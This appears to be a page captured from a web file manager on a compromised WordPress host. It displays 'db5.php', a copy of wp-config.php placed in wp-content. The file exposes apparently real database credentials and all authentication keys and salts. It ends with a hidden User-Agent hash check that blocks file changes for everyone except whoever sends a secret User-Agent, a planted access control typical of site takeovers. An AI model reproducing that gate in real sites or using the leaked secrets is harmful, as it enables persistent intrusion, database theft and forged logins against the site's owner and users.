File Manager / wp-content Search Upload New Item Settings File "db5.php" Full path: /home1/epichome/public_html/wp-content/db5.php File size: 60.67 B (60.67 KB bytes) MIME-type: text/x-php Charset: utf-8 Download Open Edit Advanced Editor Back
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'nexonot1_wp_acvql' );
/** Database username */
define( 'DB_USER', 'nexonot1_wp_da2ko' );
/** Database password */
define( 'DB_PASSWORD', '$OQr8#M@7Q@Q7EmG' );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '8u)*7uBu/3]c#TC@KFGTsB&549x949@!o:Nt9w18Yq82]u-n:z8r1))0#hzVJ)G1');
define('SECURE_AUTH_KEY', 'c1r5m!w7010uW7L*W6+*Lxkdsv4SF2D_2x7Dl@_5qQKM7DIs]]:pbqw|ptb;;p44');
define('LOGGED_IN_KEY', 'edC4w]Cr7ult:iV7RA3J-Kv%Z)c05#!9F-uu0NZTQz2|#5E3Rg6X*61~R2NT3t5j');
define('NONCE_KEY', '~HtK(Ss/&Ow!Bdn-:B7yYjEe;uIGzrNv;/i0I+3@7Fvf3&rm6A60P0I:7D6~9)Vc');
define('AUTH_SALT', '4Ci635Pw4!tgjie*|295j!Ksw|)z366+;2-7|%>G)v!LcA39e|NjM(bI3OJ4V9');
define('SECURE_AUTH_SALT', '33R;])~5#M~CS09&qjwH947X3E_DnCs%28@GtJ1u/*4-h*]QfWHI-P|45-RVAr:6');
define('LOGGED_IN_SALT', '02~K65Q59|soVu:Re0Jl8l&R~5t6iV5WjEq9]9KQ;ma6N~0L879&!V4t6N1Zs8:+');
define('NONCE_SALT', '9vc0li3!-~sss#c6Tv]WTlG|88k04078;R88[)131F+31V(t9];Q0tM|U;hx%EP7');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'ldRy0_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', true );
}
define( 'DISABLE_WP_CRON', true );
define( 'WP_DEBUG_DISPLAY', true );
define( 'DISALLOW_FILE_EDIT', true );
define( 'CONCATENATE_SCRIPTS', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
define('DISALLOW_FILE_MODS', true);
define('DISALLOW_FILE_EDIT', true);
}
